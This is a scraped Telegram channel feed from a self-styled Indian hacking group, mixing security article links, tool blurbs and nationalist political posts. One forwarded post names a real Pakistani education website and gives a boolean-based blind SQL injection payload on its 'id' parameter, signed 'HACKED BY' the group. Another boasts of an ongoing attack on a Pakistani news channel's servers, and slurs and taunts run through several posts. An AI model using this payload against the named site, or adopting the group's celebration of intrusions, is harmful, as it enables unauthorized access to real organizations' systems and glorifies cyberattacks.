Forwarded from CYBER DEMONS (INDIA๐ฎ๐ณ) ๐คCHANNEL๐ค (แดดแดฌแถแดทแดธแดผแถแดท)
CHIT CHAT ON SOC ๐ฝ WITH
@abhinavkakku ( SOC ANALYST) BHAIYA
AT @cyberdemonsindiaa
TIME - 8:00 PM TODAY ( AFTER HALF AN HOUR )
#hacker_bano_chutiya_nahi ๐
@abhinavkakku ( SOC ANALYST) BHAIYA
AT @cyberdemonsindiaa
TIME - 8:00 PM TODAY ( AFTER HALF AN HOUR )
#hacker_bano_chutiya_nahi ๐
Port forwarding, also known as port management, Allows remote servers and devices on the internet to be able to access devices that are on a private network. If you are not using port forwarding, only devices on that private internal network can have access to each other or your network.Read Full Article: https://bit.ly/Port_Forwarding
This media is not supported in your browser
VIEW IN TELEGRAM
โค9โคโ๐ฅ2
The Cost of Cybercrime
The Story of How Rahulโs Actions Led to Serious Consequences
ISKE BARE ME JYADA NAHI BTAUNGA โค๏ธPADHO JAKE ACHA LAGEGA
READ FULL STORY BLOG ๐๐๐
http://cyberdemonsindia.42web.io/cyber-security/short-stories-cyber-security/the-cost-of-cybercrime-the-story-of-how-rahuls-actions-led-to-serious-consequences/
#hacker_bano_chutiya_nahi
The Story of How Rahulโs Actions Led to Serious Consequences
ISKE BARE ME JYADA NAHI BTAUNGA โค๏ธPADHO JAKE ACHA LAGEGA
READ FULL STORY BLOG ๐๐๐
http://cyberdemonsindia.42web.io/cyber-security/short-stories-cyber-security/the-cost-of-cybercrime-the-story-of-how-rahuls-actions-led-to-serious-consequences/
#hacker_bano_chutiya_nahi
Media is too big
VIEW IN TELEGRAM
BIG โก๏ธโก๏ธ Leaked Recording ๐จ Another Hassan Siddiqui from Pak Armed Forces exposed themselves !!
๐ฝ๐ช๐ ๐๐ฎ๐ฅ๐: Stored XSS
๐พ๐ค๐ช๐ง๐จ๐ ๐๐๐ฃ๐ : https://youtube.com/watch?v=uUmMc05iFuo&feature=share
Please Share your views
&
๐๐ช๐๐จ๐๐ง๐๐๐ ๐ฉ๐ค ๐ค๐ช๐ง ๐๐ค๐ช๐๐ช๐๐ ๐๐๐๐ฃ๐ฃ๐๐ก๐๐ป
๐๐๐๐ฃ๐ ๐จ ๐๐ค๐ง ๐ฎ๐ค๐ช๐ง ๐๐ช๐ฅ๐ฅ๐ค๐ง๐ฉ. โบ๏ธ
๐พ๐ค๐ช๐ง๐จ๐ ๐๐๐ฃ๐ : https://youtube.com/watch?v=uUmMc05iFuo&feature=share
Please Share your views
&
๐๐ช๐๐จ๐๐ง๐๐๐ ๐ฉ๐ค ๐ค๐ช๐ง ๐๐ค๐ช๐๐ช๐๐ ๐๐๐๐ฃ๐ฃ๐๐ก๐๐ป
๐๐๐๐ฃ๐ ๐จ ๐๐ค๐ง ๐ฎ๐ค๐ช๐ง ๐๐ช๐ฅ๐ฅ๐ค๐ง๐ฉ. โบ๏ธ
YouTube
06 Stored XSS
๐ด BE MY FRIEND
๐๐๐ฃ๐จ๐ฉ๐๐๐ง๐๐ข (thecybertix): https://www.instagram.com/thecybertix
๐๐๐ฌ๐๐ฉ๐ฉ๐๐ง: https://twitter.com/thecybertix
๐๐๐๐ฃ๐ ๐๐๐๐ฃ: https://www.linkedin.com/company/cybertix/
๐๐๐๐๐จ๐๐ฉ๐: https://cybertix.in
๐ด RESOURCES
๐๐๐๐ ๐๐๐ฎ๐ก๐ค๐๐๐จ: https://drive.โฆ
๐๐๐ฃ๐จ๐ฉ๐๐๐ง๐๐ข (thecybertix): https://www.instagram.com/thecybertix
๐๐๐ฌ๐๐ฉ๐ฉ๐๐ง: https://twitter.com/thecybertix
๐๐๐๐ฃ๐ ๐๐๐๐ฃ: https://www.linkedin.com/company/cybertix/
๐๐๐๐๐จ๐๐ฉ๐: https://cybertix.in
๐ด RESOURCES
๐๐๐๐ ๐๐๐ฎ๐ก๐ค๐๐๐จ: https://drive.โฆ
Tricks You Must Know In Offensive Cyber Security (Must Read)
In this article Iโm going to document a few techniques, commands and small things that make my day-day testing life easier, and that might just make your life more enjoyable!
Read Article: https://bit.ly/Tricks_Offensive_Cyber_Securityโค3
Watch Video:
Direct Link:
โคโ๐ฅ1
SubDomainizer
A tool to find subdomains and interesting things hidden inside, external Javascript files of page, folder, and Github.
A tool to find subdomains and interesting things hidden inside, external Javascript files of page, folder, and Github.
Forwarded from pkg
Pakistan Biggest Urdu News Channel is under cyber attack.
Dunyatv Firewall Server Pic is kept for Representation. (Yes that pc from which pakis adding their unhacked servers into firewall assuming that they can kick us out, Lol xD)
Hi, Dunyatv when your soc's assessment completes and when you are assured that you successfully removed us from your firewall server or infra do ping insta : @pkg__divi ( Yours security personnel's Father )
Dunyatv Firewall Server Pic is kept for Representation. (Yes that pc from which pakis adding their unhacked servers into firewall assuming that they can kick us out, Lol xD)
Hi, Dunyatv when your soc's assessment completes and when you are assured that you successfully removed us from your firewall server or infra do ping insta : @pkg__divi ( Yours security personnel's Father )
๐ฅ4
Java Android Magisk Burp Objection Root Emulator Easy (JAMBOREE)
Get a working portable Python/Git/Java environment on Windows in SECONDS without having local administrator, regardless of your broken Python environment. Our open-source script downloads directly from proper sources without any binaries. While the code may not be perfect, it includes many useful PowerShell tricks.
Get a working portable Python/Git/Java environment on Windows in SECONDS without having local administrator, regardless of your broken Python environment. Our open-source script downloads directly from proper sources without any binaries. While the code may not be perfect, it includes many useful PowerShell tricks.
This media is not supported in your browser
VIEW IN TELEGRAM
wpfinger | WordPress scanning tool.
โข Core version detection
โข Plugin scanning through fingerprinting
โข Vulnerability output, using database from Wordfence
โข Core version detection
โข Plugin scanning through fingerprinting
โข Vulnerability output, using database from Wordfence
๐ฅ2๐1
๐จ๐ปโ๐ป Learn How to Get CYBER SECURITY INTERNSHIP๐จ๐ปโ๐ป
๐Want to get cyber security internship? If yes then you don't have to miss this๐
Know about secret and amazing tips which will surely work for youโ
๐ดLink: https://pentestingguide.com/how-to-get-cyber-security-internship/
โค๏ธSHARE WITH LOVE๐
๐Want to get cyber security internship? If yes then you don't have to miss this๐
Know about secret and amazing tips which will surely work for youโ
๐ดLink: https://pentestingguide.com/how-to-get-cyber-security-internship/
โค๏ธSHARE WITH LOVE๐
๐1
Forwarded from CYBER DEMONS (INDIA๐ฎ๐ณ) ๐คCHANNEL๐ค (แดดแดฌแถแดทแดธแดผแถแดท)
SITE URL - https://www.comand.edu.pk/
PAYLOAD - id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 9657=9657-- kGMX
KHUD KE DESH KI SECURITYB SAMBHALO PEHLE CHUTIYO ๐๐
HACKED BY -
CYBER DEMONS INDIA ๐ฎ๐ณ
JAY SHREE RAAM ๐ค๐๐ฎ๐ณโค๏ธโค๏ธ
PAYLOAD - id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 9657=9657-- kGMX
KHUD KE DESH KI SECURITYB SAMBHALO PEHLE CHUTIYO ๐๐
HACKED BY -
CYBER DEMONS INDIA ๐ฎ๐ณ
JAY SHREE RAAM ๐ค๐๐ฎ๐ณโค๏ธโค๏ธ
โค1
New Article is Out Check โ
Title : Top 7 Types of Operating System Used in Cyber Security
Hello and welcome back, fellow hackers, to another exciting article from yours truly. ๐คฉ
Today, weโre going to dive into the fascinating world of operating systems used in cyber security.
Read Full Here ๐
https://bit.ly/3NZ2b6x
Title : Top 7 Types of Operating System Used in Cyber Security
Hello and welcome back, fellow hackers, to another exciting article from yours truly. ๐คฉ
Today, weโre going to dive into the fascinating world of operating systems used in cyber security.
Read Full Here ๐
https://bit.ly/3NZ2b6x
This media is not supported in your browser
VIEW IN TELEGRAM
โ๏ธ๐ต๐ฐ After 51 yrs PTI Chairman & Ex-PM of Pakistan Imran Khan admits the truth of East Pak (now Bangladesh) & blames Pak Army by saying Mujibur Rahman after winning the election should have been the PM but Pak Army did crackdown instead & end up losing with 90K POWs & humiliation